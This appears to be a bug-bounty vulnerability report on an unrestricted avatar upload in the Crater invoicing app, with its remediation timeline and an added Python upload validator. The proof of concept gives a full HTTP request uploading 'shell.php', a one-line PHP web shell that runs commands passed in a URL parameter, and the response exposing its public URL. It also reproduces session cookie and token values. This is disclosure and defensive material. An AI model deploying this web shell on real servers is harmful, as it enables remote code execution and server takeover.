Unrestricted Upload of File with Dangerous Type in crater-invoice/crater

Status: Valid

Reported on: Dec 3rd 2021

Description

In the current Crater version (commit ed6268aa, tag 5.0.3), the lowest-privileged user can upload a PHP file in place of an avatar.

Proof of Concept

POST /api/v1/me/upload-avatar HTTP/1.1
Host: 172.17.0.1:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
company: 1
X-XSRF-TOKEN: eyJpdiI6IlBrOE1JS01vcDBqL0hqcXZURTRQMmc9PSIsInZhbHVlIjoiMVVSUVk5N3FmYTh2UG5KSiszSmp3aEg5MXlxSWFMUHRNZFpyME5LRFM3OEpiRWR3dlVCeDJ4a2FYQU9hYmFrZjBmNVBUbGp5UitIY1c3L1JtcWtGaDdoalBXSXU3L2NFS2NMbHZVT3JhNm1zeXdLZllkR2RNVGdKL3NuSWhWblciLCJtYWMiOiI0OTRhMmZkZGFjODA1MWY3ZWQyZmRhY2RhNmRkOTVlNDc0Njg2YzlmY2E2NzkyZjU0ZWExNjBiZjVhZGViMGE2IiwidGFnIjoiIn0=
Content-Type: multipart/form-data; boundary=---------------------------324661512726686552372889486730
Content-Length: 270
Origin: http://172.17.0.1:8888
DNT: 1
Connection: close
Referer: http://172.17.0.1:8888/admin/settings/account-settings
Cookie: XSRF-TOKEN=eyJpdiI6IlBrOE1JS01vcDBqL0hqcXZURTRQMmc9PSIsInZhbHVlIjoiMVVSUVk5N3FmYTh2UG5KSiszSmp3aEg5MXlxSWFMUHRNZFpyME5LRFM3OEpiRWR3dlVCeDJ4a2FYQU9hYmFrZjBmNVBUbGp5UitIY1c3L1JtcWtGaDdoalBXSXU3L2NFS2NMbHZVT3JhNm1zeXdLZllkR2RNVGdKL3NuSWhWblciLCJtYWMiOiI0OTRhMmZkZGFjODA1MWY3ZWQyZmRhY2RhNmRkOTVlNDc0Njg2YzlmY2E2NzkyZjU0ZWExNjBiZjVhZGViMGE2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im13VlVJa1JyZWs4OWFLWlBBa0JobXc9PSIsInZhbHVlIjoiU21kVnR2Skc1UnZmSnR3SVhiL09qSFBmWGxGV0FMUi9pSzFSTkc2enBZL01GbkJBbCtiMzJmWnNLM3l2OWRJRVk0bUZ2dFRYTkVTWnRQV0xCNnkxbFdIOEJjS1E5N2dwRWNyNC90cHZRSTJaWHozcWNtcmo2RTltY2U0Q1ZEeXQiLCJtYWMiOiJmMzIxYTFiNjU2Y2QyOWM2ZDdiOWJiYzMyYjQ3NWFmZGM3NDU0ZTA0MjNhZjg0ZGEzZDgzZGFlMGEwMjQzMGJmIiwidGFnIjoiIn0%3D; D5zxaxhEVxptcHSFSkkLadY5LtUnr9yDLzGS8IGz=[value removed]

-----------------------------324661512726686552372889486730
Content-Disposition: form-data; name="admin_avatar"; filename="shell.php"
Content-Type: image/svg+xml

<?php print_r(shell_exec($_GET[1])); ?>
-----------------------------324661512726686552372889486730--

In the response, the link to the uploaded file is returned in data->avatar:

{
    "data":
    {
        "id": 3,
        "name": "user2",
        "email": "user2-crater@zaqwsx.cc",
...
        "avatar": "http:\/\/172.17.0.1:8888\/storage\/4\/shell.php",
        "is_owner": false,
...
    }
}

Impact

Severity is high: the uploaded PHP file is reachable at the URL returned in the response, so this leads to remote code execution on the server.
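As an added illustration (not code from this report or from Crater), the following Python validator shows the check the avatar handler lacked: it decides on the file's leading bytes and an extension allowlist instead of the client-supplied filename or Content-Type, and rejects a multipart body shaped like the PoC above. The function names, the allowlist and the constructed request body are my assumptions.

```python
import email
import secrets

# Allowlist of avatar formats: MIME type -> (leading magic bytes, permitted extensions; first is canonical).
# SVG is deliberately absent: it is XML and may carry script, so it is not a safe avatar type.
ALLOWED_IMAGES = {
    "image/png": (b"\x89PNG\r\n\x1a\n", ("png",)),
    "image/jpeg": (b"\xff\xd8\xff", ("jpg", "jpeg")),
    "image/gif": (b"GIF8", ("gif",)),
}

def sniff_image_type(content: bytes):
    """Return the MIME type implied by the file's magic bytes, or None if unrecognised."""
    for mime, (magic, _) in ALLOWED_IMAGES.items():
        if content.startswith(magic):
            return mime
    return None

def validate_avatar(filename: str, content: bytes):
    """Decide from the bytes, never from the declared Content-Type or the extension alone."""
    sniffed = sniff_image_type(content)
    if sniffed is None:
        return False, "content is not an allowed raster image"
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_IMAGES[sniffed][1]:
        return False, f"extension .{ext} does not match sniffed type {sniffed}"
    return True, sniffed

def storage_name(sniffed: str) -> str:
    """Never keep the client's filename; derive a random name and the canonical extension."""
    return f"{secrets.token_hex(16)}.{ALLOWED_IMAGES[sniffed][1][0]}"

def parse_multipart(content_type: str, body: bytes):
    """Yield (filename, declared Content-Type, raw bytes) for every file part of a multipart body."""
    msg = email.message_from_bytes(b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body)
    for part in msg.walk():
        if part.get_filename():
            yield part.get_filename(), part.get_content_type(), part.get_payload(decode=True)

# Constructed request body mirroring the report's PoC (the file content is a harmless stand-in).
BOUNDARY = "---------------------------324661512726686552372889486730"
POC_CONTENT_TYPE = f"multipart/form-data; boundary={BOUNDARY}"
POC_BODY = (f"--{BOUNDARY}\r\n"
            'Content-Disposition: form-data; name="admin_avatar"; filename="shell.php"\r\n'
            "Content-Type: image/svg+xml\r\n\r\n"
            "<?php echo 'constructed placeholder'; ?>\r\n"
            f"--{BOUNDARY}--\r\n").encode()

def check_poc():
    """Run the PoC-shaped upload through the validator: the declared image type is ignored, so it is rejected."""
    return [(fn, declared, validate_avatar(fn, content))
            for fn, declared, content in parse_multipart(POC_CONTENT_TYPE, POC_BODY)]
```

In a Laravel application the same effect is obtained by validating the request field with the `image` and `mimes:` rules and storing the file under a server-generated name.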

Occurrences

The same unvalidated file upload also occurs at the two locations recorded below (CompanyController.php#L95 and CompanyController.php#L64).

Timeline

We are processing your report and will contact the crater-invoice/crater team within 24 hours. (2 years ago)
theworstcomrade modified the report (2 years ago)
theworstcomrade modified the report (2 years ago)
We created a GitHub Issue asking the maintainers to create a SECURITY.md (2 years ago)
We have contacted a member of the crater-invoice/crater team and are waiting to hear back (2 years ago)
Mohit Panjwani validated this vulnerability (2 years ago)
theworstcomrade has been awarded the disclosure bounty
The fix bounty is now up for grabs (2 years ago)
Mohit Panjwani marked this as fixed in 6.0.0 with commit cdc913 (2 years ago)
theworstcomrade has been awarded the fix bounty
This vulnerability will not receive a CVE
CompanyController.php#L95 has been validated
CompanyController.php#L64 has been validated